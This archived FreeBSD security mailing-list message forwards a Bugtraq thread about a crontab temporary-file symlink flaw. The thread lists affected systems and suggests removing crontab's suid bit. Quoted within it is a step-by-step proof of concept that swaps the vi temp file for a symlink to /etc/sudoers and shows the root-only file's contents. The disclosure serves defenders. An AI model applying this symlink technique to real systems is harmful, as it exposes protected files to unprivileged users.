From owner-freebsd-security Thu Oct 26 5:36:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from gwdu42.gwdg.de (gwdu42.gwdg.de [134.76.10.26]) by hub.freebsd.org (Postfix) with ESMTP id 41A2737B479 for ; Thu, 26 Oct 2000 05:36:45 -0700 (PDT) Received: from gwdu20.gwdg.de ([134.76.98.2] ident=kheuer) by gwdu42.gwdg.de with smtp (Exim 3.14 #18) id 13omGg-0005h9-00 for freebsd-security@freebsd.org; Thu, 26 Oct 2000 14:36:26 +0200 Received: from localhost by gwdu20.gwdg.de (5.65v4.0/1.1.10.5/11Feb98-0154PM) id AA28315; Thu, 26 Oct 2000 14:36:25 +0200 Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST) From: Konrad Heuer To: freebsd-security@freebsd.org Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D; seems to depend on the way vi stores edit info in /tmp. Exploit does not work with emacs, e.g. I removed suid bit of crontab as a workaround. Its not possible for a user to modify files owned by someone else in this way. Regards K. Heuer (kheuer@gwdg.de) ---------- Forwarded message ---------- Date: Wed, 25 Oct 2000 12:30:47 +0200 From: "Fabio Pietrosanti (naif)" Reply-To: naif@inet.it To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST) Resent-From: Eckhard Handke Resent-To: Konrad Heuer Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability Tested also on: FreeBSD 3.3 = Vulnerable FreeBSD 2.2.8 = Vulnerable Aix 4.2 = Not Vulnerable Linux Slackware 7.0 = Not Vulnerable Linux Slackware 4.0 = Not Vulnerable naif On Tue, 24 Oct 2000, Sergey Nenashev wrote: > Hi, > > Tested on > 4.0-RELEASE FreeBSD 4.0-RELEASE #9 > 4.1-RELEASE FreeBSD 4.1-RELEASE #1: > > > Can read any file wich start with comment simbol (#) > > > > $ ls -l /etc/sudoers > -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers > $ id > uid=1002(alf) gid=1002(alf) groups=1002(alf) > > > $ crontab -e > ~ > ~ > ~ > /tmp/crontab.hLmjTbK417 > :!sh > > [ #### Make simbolik link] > > rm /tmp/crontab.hLmjTbK417 > > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417 > > exit > > [ #### quit vi ] > /tmp/crontab.hLmjTbK417 > crontab: installing new crontab > > [ #### start crontab editor] > > $ crontab -e > [####### See in vi] > # sudoers file. > # > # This file MUST be edited with the 'visudo' command as root. > # > # See the sudoers man page for the details on how to write a sudoers > file. > # > > # Host alias specification > > # User alias specification > > # Cmnd alias specification > > # User privilege specification > root ALL=(ALL) ALL > alf ALL=(ALL) ALL > ~ > ~ > ~ > > > > > If file started with no # then crontab sad > > "/tmp/crontab.GAeNMP1357":2: bad minute > crontab: errors in crontab file, can't install > > > > > -- > ------ > Alf Delems > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message